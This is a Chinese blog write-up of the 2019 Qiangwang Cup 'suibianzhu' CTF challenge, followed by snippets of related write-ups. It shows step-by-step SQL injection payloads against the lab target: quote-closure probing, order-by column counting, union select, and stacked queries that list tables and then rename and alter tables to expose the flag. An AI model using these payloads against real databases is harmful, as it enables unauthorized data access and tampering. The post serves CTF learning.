[强网杯 2019]随便注 1

已于 2022-04-30 16:41:37 修改
阅读量2.8k 收藏 7
点赞数 2
文章标签: php
于 2022-03-14 22:40:02 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tomatoff/article/details/123490140
版权

1、登录页面:
在这里插入图片描述
2、直接提交1:
在这里插入图片描述
3、提交1’:
在这里插入图片描述
4、提交1":
**在这里插入图片描述**
5、由输入为1’时报错,所以猜测结果语句应该为单引号闭合;
所以提交a’ or ‘1’='1,获得:
在这里插入图片描述
6、后面不太会了,参考了大佬的文章:
[强网杯2019]随便注(初学者看过来)BUUCTF[强网杯 2019]随便注 的三种解法

7、使用1’ order by 1 # ,依次测试字段数,到3时报错,说明字段数为2:

在这里插入图片描述
在这里插入图片描述
8、这边学到一点,使用 union注入,可以显示过滤的关键字。

1' union select 1,2#

在这里插入图片描述
9、然后使用“堆叠注入”(就是通过 ; 号注入多条SQL语句),可以通过show databases查看数据库。

0'; show databases; #

在这里插入图片描述
9、使用 show tables 查看表。

0'; show tables; #

在这里插入图片描述
10、查看words表的内容。

1'; show columns from words; #

在这里插入图片描述
11、查看表 1919810931114514 的内容。(表名为数字时,要用反引号包起来查询。)
在这里发现有一个flag的字段。

0'; show columns from `1919810931114514`; #

在这里插入图片描述
12、借鉴 : 强网杯2019随便注

1,通过 rename 先把 words 表改名为其他的表名。

2,把 1919810931114514 表的名字改为 words 。

3 ,给新 words 表添加新的列名 id 。

4,将 flag 改名为 data 。

1'; rename table words to word1; rename table `1919810931114514` to words;alter table words add id int unsigned not Null auto_increment primary key; alert table words change flag data varchar(100);#
————————————————
版权声明:本文为CSDN博主「天问_Herbert555」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。
原文链接:https://blog.csdn.net/qq_44657899/article/details/103239145

在这里插入图片描述

MagnoZ
关注
专栏目录
BUUCTF系列 // [强网杯2019] 随便
qq_45805420的博客
09-23 608
前言 本题知识点:SQL堆叠入 WP 打开题目,很明显的提示我们应该是SQL入了 So,先按照一般的流程,尝试基本的探测姿势 1. 探测有无入 1' 报错 1'--+ 报错 1'# 正常有回显 1' and 1=1# 正常有回显 1' and 1=2# 正常无回显 可知存在入,且 --+ 释被过滤,# 释可用 2. 尝试获取列数 1' order by 1# 正常有回显 1' order by 2# 正常有回显 1' order by 3# 报错 用 order by
BUUCTF[强网杯2019]随便
楼阁de猫的博客
09-23 533
[强网杯2019]随便 知识点:堆叠入 首先先输入一个1’,发现报错,再输入1’#,有回显,再输入1’ order by 2#,1’order by 3#,当输入3的时候发现无回显,说明入点是2,但是当我们输入1’ union select 1,2#时,发现过滤了很多关键字,这时我们就要考虑堆叠入 我们输入1’; 发现下面出现了一条横线 那应该是堆叠入了,(什么是堆叠入呢:在SQL中,分号是用来表示一条sql语句的结束。如果在 ; 结束一个sql语句后继续构造下一条语句,效果就是分别执行两
【BUUCTF】[强网杯 2019]随便 1
qq_45972928的博客
05-06 4085
这是一个典型的sql入题目 知识点: 1、入点检测 2、万能匹配 3、暴力获得数据表和其属性 4、sql语句的掌握(order by; union select; rename table; alter table…等等) 1、进入网站 2、看到一个输入框一个提交框,尝试进行数据输入了解大致情况 经过尝试我们发现,只有输入1,2时有显示,输入0或者其他时没有显示 3、测试是否存在入 and 1=1和and 1=2没有变化 在参数后面加单引号,发现错误,可以尝试进行入 4、尝试0‘ or
[强网杯 2019]随便1
最新发布
m0_73759843的博客
07-18 182
前面已经提示不能使用,where等字段;尝试显错入发现不行。
buuctf [强网杯 2019]随便 1
weixin_45642610的博客
01-07 1万+
buuctf web [强网杯 2019]随便 1 -刷题个人日记 小白一个,写给自己看。 打开后是这样。 从题目和内容来看就是一道sql入题。 输入 1' or 1=1;# 这个#用来释掉后面的sql语句 显示所有数据,这个数据有什么用我也不知道,但sql入一般第一步就是这样看看有没有有用的信息(没有)。 输入 1' order by 2;# 1' order by 3;# 到第3列报错,说明只显示两列。 输入1'; show tables;# 可以看到有 191981093
BUUCTF [强网杯 2019]随便 1(两种方法)
m0_62879498的博客
03-05 1万+
[强网杯 2019]随便 1 第一步,先判断入点的传参方式,发现是get传参。 第二步,判断闭合方式: 1’and 1=1-- q 1’and 1=2-- q 说明闭合方式为 单引号 如果输入1“and 1=1-- q 和1”and 1=2-- q 两次的回显结果一样,说明闭合方式不是 双引号 其他同理 第三步,判断是否有关键字过滤: 先直接输入: select 查看回显,发现: 发现本题过滤关键字:/select|update|delete|drop|insert|where|\.而且不区分
【BUUCTF】web之强网杯2019随便
12-14
开始入: 1’ : 报错 ...# 这里意表名为数字的要加反引号 “ :在网上百度发现 得到 一个带有flag的字段 和 另一个 可查询的表 flag表:可查询表: 到这里虽然发现flag 但是select已经被ban了所
[强网杯 2019]随便.docx
12-18
强网杯 2019】SQL 入详解 SQL 入是一种常见的网络安全漏洞,攻击者通过在输入参数中嵌入恶意的 SQL 代码,从而控制或篡改数据库的行为。在本题中,参赛者面对的就是一道典型的 SQL 入题目。首先,通过尝试...
SQL Injection8(堆叠入)——强网杯2019随便
热门推荐
kid的博客
05-28 1万+
SQL Injection8(堆叠入)——强网杯2019随便 前言 前面参加强网杯线上赛,亲身体验了一把ctf从入门到入土,从打ctf变成被ctf打… 这里结合里面的题来对里面的知识点进行一个学习总结 随便是一道sql入题,因为过滤规则十分强大,所以很难… 这里会用到堆叠入的知识,堆叠入前面有所了解,觉得并不难,所以也没练习过,但做这道题的时候就又些懵了。 堆叠入原理 在SQL中,...
BMZCTF 强网杯 2019 随便
qq_26243045的博客
11-29 397
考点:sql入、二次入 打开网页,是一个输入框: 输入1,并提交: 看到返回数组,测试是否存在入点:输入1‘ 返回报错。 输入1‘ # 返回正常 尝试手工入: 1、输入1‘ order by *,测试能返回几列,多次尝试,*处为2,即:1’ order by 2能返回正常。 再试着输入select测试返回点:1’ union select 1,2 # 看到好多字符被过滤。尝试sqlmap 只能爆出库名为supersqli 尝试堆叠入 输入:1’; s
[强网杯 2019]随便
m0_56691564的博客
11-30 2777
该题作者在页面就查了这两个字段的内容,由于该题禁用select,因此我们可以用作者原本设定的查表函数来帮我们查我们想要查找的内容。用rename把words表改名为其他的表名,把 1919810931114514表的名字改为words,给words表添加新的列名id,将flag改名为data。大意应该是过滤了select,绕过一下,好的发现绕过不了,不管是编码还是释都不行,因此这个题使用堆叠入。由show的作用可知,words表内就两个字段,一个叫id,一个叫data。
BUUCTF-WEB:[强网杯 2019]随便 1
_Co1a
01-24 988
题目环境:http://de044ac0-9162-4b83-b6a6-8c99ce0efe91.node3.buuoj.cn 打开环境: 尝试入: 解题思路: 1、先尝试用union联合入:第一步、测试入点(一些小tips:利用引号,and 1=1, or 1=1之类的)判断是字符型还是数字型 1' [error] 1'# [不报错,正常回显] 1' and 1=1# ...
BUUCTF -web- [强网杯 2019]随便
qq_44640313的博客
12-14 2669
以buuctf的强网杯2019为例的堆叠
强网杯2019随便
qq_45927819的博客
09-10 1099
题目: 由题目信息可得出,采用SQL入; 首先判断闭合符号,输入1’ 发现报错了,用**#**截断 那么存在入漏洞,接下来查询字段数,**1’ order by 3#**发现报错了 **1’ order by 2#**则显示正常,那么字段数为两个; 联合查询:1’ union select 1,2# select,update,…都被过滤掉了; 堆叠入:又叫多语句入,就是原本只执行一个sql句,用函数让他可以执行多个sql语句。 我们继续查询数据库:1’;show databases;# 接下来
buuctf-强网杯2019随便
09-03
buuctf-强网杯2019随便是一场2019强网杯举办的CTF比赛中的一道题目。这道题目的名称暗示着它是一个与入漏洞相关的题目。 入漏洞是一种网络安全漏洞,攻击者可以通过在用户输入的数据中入恶意代码来获取或者修改数据库中的数据。通常,这种漏洞主要存在于动态网页应用程序中,比如通过用户输入生成SQL查询语句的网页。攻击者可以通过在用户输入的数据中插入SQL代码,从而绕过正常的验证机制,查看、修改或者删除数据库中的数据。 为了解决入漏洞,我们需要在编写动态网页应用程序时,对用户输入的数据进行严格的验证和过滤,避免将恶意代码传递给数据库。 对于buuctf-强网杯2019随便这道题目,我们需要了解题目的具体要求和给定的环境,然后通过分析和尝试来找到漏洞的利用方法。可能的解题思路包括对输入的数据进行SQL入、获取数据库中的信息或者修改数据库中的数据等等。 解决这道题目需要具备一定的网络安全知识和相关工具的使用能力。通过不断的尝试和调试,找到并利用漏洞成功获取到flag(标志),即为完成题目。 总之,buuctf-强网杯2019随便是一道涉及入漏洞的CTF题目,要求我们通过找到并利用漏洞来获取flag。完成这道题目需要一定的网络安全知识和技术。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值